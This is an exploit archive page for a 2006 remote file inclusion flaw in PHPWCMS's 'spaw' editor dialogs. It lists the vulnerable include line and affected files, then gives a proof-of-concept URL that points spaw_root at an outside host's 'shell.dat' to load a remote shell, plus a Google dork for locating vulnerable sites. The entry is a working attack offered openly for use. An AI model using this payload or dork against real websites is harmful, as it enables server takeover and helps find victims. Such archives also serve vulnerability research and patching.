[] NeoSense
E X P L O I T S
title author type platform port cve id

PHPWCMS 1.1-RC4 - 'spaw' Remote File Inclusion

Author: Morgan
type: webapps
platform: php
port: 80.0
date_added: 2006-08-09 
date_updated: 2016-09-01 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comphpwcms_1.1-RC4_2004-05-01.tar.gz
PhpwCMS 1.2.6 <= Multiple Remote file inclusion vulnerabilities

Discovered by :

|\/| _ ._ _  _.._
|  |(_)| (_|(_|| |
          _|



Vuln In :
include $spaw_root.'class/lang.class.php';

Affected Files :
include/inc_ext/spaw/dialogs/table.php
include/inc_ext/spaw/dialogs/a.php
include/inc_ext/spaw/dialogs/colorpicker.php
include/inc_ext/spaw/dialogs/confirm.php
include/inc_ext/spaw/dialogs/img.php
include/inc_ext/spaw/dialogs/img_library.php
include/inc_ext/spaw/dialogs/td.php

Vendor Website: http://www.phpwcms.de/

PoC:
http://server/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ehmorgan.net/shell.dat?

Google Dork:

inurl:"phpwcms/index.php?id="

Visit us :

www.ehmorgan.net
irc.gigachat.net
#Morgan

# milw0rm.com [2006-08-10]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.